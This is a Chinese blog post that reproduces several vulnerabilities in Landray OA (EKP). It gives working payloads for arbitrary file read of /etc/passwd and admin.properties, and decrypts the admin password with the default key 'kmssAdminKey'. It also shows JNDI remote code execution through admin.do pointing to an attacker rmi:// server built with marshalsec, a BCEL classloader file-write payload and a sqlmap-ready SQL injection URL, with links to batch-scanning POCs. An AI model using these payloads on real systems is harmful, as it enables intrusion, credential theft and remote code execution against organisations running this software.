当前位置:   article > 正文

蓝凌OA漏洞复现

蓝凌oa漏洞


前言

又是学习漏洞的一天,老是能听到蓝凌OA爆发了什么,我就很蒙蔽,想问问旁边师傅,蓝凌是个什么,又怕师傅来句你连蓝凌都不知道,怪尴尬,索性还是靠自己把,今天复现蓝凌OA

任意文件读取漏洞

漏洞描述

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息。

漏洞复现

访问/sys/ui/extend/varkind/custom.jsp,抓包并修改为POST,并加上payload(var={“body”:{“file”:“file:///etc/passwd”}}),在此进行发包
在这里插入图片描述
但是嘛,保不齐人家不是linux系统,所以不要试完这个payload读不出来,就代表它不存在漏洞

批量扫描POC

在github:https://github.com/Xd-tl/Landray-POC,需要请自取
在这里插入图片描述

SSRF+JNDI远程命令执行

漏洞描述

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限

漏洞复现

利用任意文件读取/WEB-INF/KmssConfig/admin.properties配置文件
在这里插入图片描述
获得password,由于蓝凌OA默认是AES加密,且 默认密钥为 kmssAdminKey,所以只要拿着password进行解密就好(返回的password字符串去掉末尾的/r在进行解密)
在这里插入图片描述
拿到密码了发现是个弱密码这这这,竟然忘了爆破,势必得进一波后台啦,不然那就可太亏了,这都快2022年了,不会还有人不知道后台地址把,竟然是我不知道,大意了,赶紧百度一下,原来是久违的admin.do
在这里插入图片描述
利用burp对其抓包,并修改为POST,在加上payloadmethod=testDbConn&datasource=rmi://xxx.xxx.xxx.xxx:xxxx/cbdsdg
,现在我们先构造恶意的exp,类似于dnslog

在这里插入图片描述
对其进行编译,并让其兼容1.7
在这里插入图片描述
在把生成的exp.class文件放到我们服务器上,在使用marshalsec工具(https://github.com/mbechler/marshalsec)构建一个JNDI服务
在这里插入图片描述
最后就是发送payload
在这里插入图片描述
最后看服务器的记录,由于本地没有success文件所以会报404,但是目标是请求了咱的服务器,
在这里插入图片描述
说明成功执行了咱们的命令

任意文件写入漏洞

漏洞描述

蓝凌OA 存在任意文件写入漏洞,攻击者可以上传恶意文件

漏洞复现

在上面的任意文件读取漏洞中,修改其payload为var={“body”:{“file”:“/sys/search/sys_search_main/sysSearchMain.do?method=editParam”}}&fdParemNames=11&fdParameters=[shellcode]即可
在shellcode位置补上,发包即可

<java>
<void class="com.sun.org.apache.bcel.internal.util.ClassLoader">
	<void method="loadClass">
		<string>$$BCEL$$......</string>
		<void method="newInstance"></void>
	</void>
</void>
</java>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8

有关详细操作,在我的Java安全专栏里面的BCEL Classloader(https://blog.csdn.net/xd_2021/article/details/121878806)文章里面最后复现了一个,该文章讲BCEL的,有兴趣的可以看看,关于BCEL编码工具我也是写了一个在github上(https://github.com/Xd-tl/BCELCode)

批量扫描POC

在github:https://github.com/Xd-tl/Landray-POC,需要请自取
在这里插入图片描述

EKP后台SQL注入

漏洞描述

深圳市蓝凌软件股份有限公司数字OA(EKP)存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。

漏洞复现

漏洞urlhttps://xxx.xxx.xxx.xxx/km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true
访问该url并对其抓包,拿到包后保存到文件里面,利用sqlmap -r即可


总结

最后也是全部复现完了,也让我明白爆破的重要性,先爆,爆不出,在走正常路子

大家可以关注菜鸡的公众号,有什么好想法也可以让我学习一下,有什么问题可以一块解决,由于二维码违规,下面是base64编码的文字

5b6u5L+h5YWs5LyX5Y+34oCc5a6J5YWo5re35a2Q4oCd77yM5Y+v5Lul55So5b6u5L+h5pCc5LiA5pCc77yM5q2j5Zyo5a6M5ZaE5LitLi4uLi4u

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Gausst松鼠会/article/detail/90791
推荐阅读
相关标签
  

闽ICP备14008679号